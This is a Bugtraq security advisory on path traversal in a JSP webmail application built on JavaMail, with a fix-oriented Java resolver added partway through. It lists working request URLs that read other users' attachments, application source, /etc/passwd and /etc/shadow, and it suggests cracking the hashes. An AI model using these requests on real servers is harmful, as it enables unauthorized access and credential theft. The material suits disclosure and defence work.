Bugtraq mailing list archives

Javamail Multiple Information Disclosure Vulnerabilities
From: Ricky Latt <ygnboyz () gmail com>
Date: 25 May 2005 02:24:27 -0000
Javamail Multiple Information Disclosure Vulnerabilities

May 25, 2005 Yangon, Myanmar.

Vulnerable Systems:
 * JavaMail API 1.3
 * JavaMail API 1.2
 * JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

ReadMessage.jsp fails to restrict access to other directories and files:

File Name: <%=mp.getFileName()%><br>
Type: <%=abc.getContent_Type()%><br>
Size: <%=abc.getMsgSize()/1024%>Kb<br>
<a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br>

<%=abc.getFilePath() + "/" + abc.getFileName() %>

This gives an attacker any file on the system, because the download link is built directly from getFilePath() + "/" + abc.getFileName().

1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information

1. Open specific mailbox attachment

When a user downloads a message attachment from the JavaMail webmail, an attacker may notice the URL
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension

Then noticed that the URL led to folders under /var, so tried switching folders:

http://example.com/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user

But got errors. Finally, on reaching this URL:

http://example.com/mailboxesdir/user@example.com/

it gave a listing of the attachments in the user@example.com mailbox.

Even unauthorized users are able to view a specific mailbox's attachments. An attacker needs to know only the username in order to get the attachment listing:

http://example.com/mailboxesdir/user2@example.com/

http://example.com/mailboxesdir/user3@example.com/


2. Download configuration information of javamail

And noticed that docdownloadfile.jsp redirects to where the file is located on the server, using the parameter f. The web browser actually receives the redirect target:

http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension

This information leads to web.xml:

http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml


which gives the configuration information of JavaMail.

Download source code of jsp files:
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
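The root cause shared by the ReadMessage.jsp link in the first section and the Download handler described here is that a client-supplied path is opened as-is, with no check that it stays inside the mailbox directory of the logged-in user. The following is an added example of a hardened attachment resolver (not code from JavaMail or from the affected webmail application); the mailbox directory layout, the class name and the method names are assumptions taken from the URLs quoted above.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/** Added example: resolves a client-supplied attachment name only inside the
 *  authenticated user's own mailbox directory. Not the original webapp's code. */
public class SafeAttachmentResolver {
    // Assumed layout from the advisory: <base>/<mailbox>/<messageid>/<filename>
    private final Path mailboxesDir;

    public SafeAttachmentResolver(Path mailboxesDir) {
        this.mailboxesDir = mailboxesDir.toAbsolutePath().normalize();
    }

    /**
     * @param authUser  mailbox of the logged-in session (taken from the session, never from the request)
     * @param messageId message folder requested by the client
     * @param fileName  attachment name requested by the client
     * @return the resolved path, or null if the request must be rejected
     */
    public Path resolve(String authUser, String messageId, String fileName) {
        // Reject separators and parent references in the client-controlled components
        for (String part : new String[] {messageId, fileName}) {
            if (part == null || part.isEmpty() || part.contains("/") || part.contains("\\")
                    || part.equals(".") || part.equals("..")) {
                return null;
            }
        }
        Path userDir = mailboxesDir.resolve(authUser).normalize();
        Path target = userDir.resolve(messageId).resolve(fileName).normalize();
        // Containment check after normalisation: the result must stay under the user's mailbox
        if (!target.startsWith(userDir)) {
            return null;
        }
        return target;
    }

    public static void main(String[] args) {
        SafeAttachmentResolver r = new SafeAttachmentResolver(Paths.get("/var/serviceprovider/web/mailboxesdir"));
        // Legitimate request, built from the advisory's example URL
        System.out.println(r.resolve("user@example.com", "messageid123@user", "filename.extension"));
        // Parent-directory and absolute-path requests of the kind shown in the advisory are rejected (null)
        System.out.println(r.resolve("user@example.com", "..", "web.xml"));
        System.out.println(r.resolve("user@example.com", "messageid123@user", "/etc/passwd"));
    }
}
```

Symbolic links inside the mailbox tree are not covered by this check; calling toRealPath() on the result before opening it closes that gap, at the cost of requiring the file to exist.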
3. Target machine Root/Admin Compromise

In UNIX, /etc/passwd and /etc/shadow are important files.

A little bit curious, tried typing this in the web browser:
http://example.com/Download?/etc/passwd

An example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh

Then crack the Unix password files with John the Ripper.

John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'.

http://example.com/Download?/etc/shadow

root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::

http://example.com/Download?/etc/group
/etc/group file:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:


When an attacker gets information on the root/admin user of the target server, it can lead to any attack. The attacker may do website defacement, database altering, data theft and more.

4. Download server information

http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done.

By 
Thet Aung Min Latt thetaung () gmail com
http://thetaung.amyanmar.com